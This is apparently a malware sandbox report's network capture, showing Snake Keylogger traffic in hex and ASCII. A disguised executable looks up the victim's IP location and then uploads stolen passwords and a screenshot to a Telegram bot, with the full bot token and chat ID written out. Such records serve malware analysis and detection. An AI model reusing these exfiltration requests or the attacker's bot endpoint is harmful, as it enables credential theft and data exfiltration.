                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.1049737188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:37 UTC675INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:37 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8049
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtyQSws5%2FsAitKWRqQLI1k4%2BOG2g013NQ8IeKowgWdc1t9jOT3lMWLGEdUyiqKtukBwQj59a49aZRS4komT01bzGunPbXGyvey4CEtBgZfwLREibMhprL1B2iZ4X6kgAJA7%2B1DA"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240e6cd6872b6-EWR
                                              2024-09-26 09:33:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.1049739188.114.96.34435500C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:39 UTC669INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 09:33:39 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 8051
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F3xrMdBObwRfaFoqf8tK500coDmTgBIJv481o7Naf8W5xvrtutTwMf6npH2dfYDEqVyNupqBx2nmZtwHWQo0HGJ83DnWnm52Sx2d7Ve65mAGbfrXewVQyZW23aE2GL7giEWFY97i"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c9240eeeaaa1899-EWR
                                              2024-09-26 09:33:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 09:33:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.1049740149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:40 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdea6f6d70bdc
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:33:40 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 65 61 36 66 36 64 37 30 62 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdea6f6d70bdcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:33:40 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:40 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:33:40 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6327,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343220,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.1049745149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:50 UTC324OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf231755d157
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              2024-09-26 09:33:50 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 32 33 31 37 35 35 64 31 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdf231755d157Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:33:51 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:51 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:33:51 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6329,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343231,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.1049746149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:52 UTC324OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf347345ddbc
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              2024-09-26 09:33:52 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 33 34 37 33 34 35 64 64 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdf347345ddbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:33:53 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:52 GMT
                                              Content-Type: application/json
                                              Content-Length: 506
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:33:53 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6330,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343232,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.1049747149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:53 UTC324OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf486d1d1a62
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              2024-09-26 09:33:53 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 34 38 36 64 31 64 31 61 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdf486d1d1a62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:33:54 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:33:54 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:33:54 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6331,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343234,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.1049748149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:33:55 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf59b14a5f3a
                                              Host: api.telegram.org
                                              Content-Length: 673736
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 35 39 62 31 34 61 35 66 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcdf59b14a5f3aContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:33:55 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
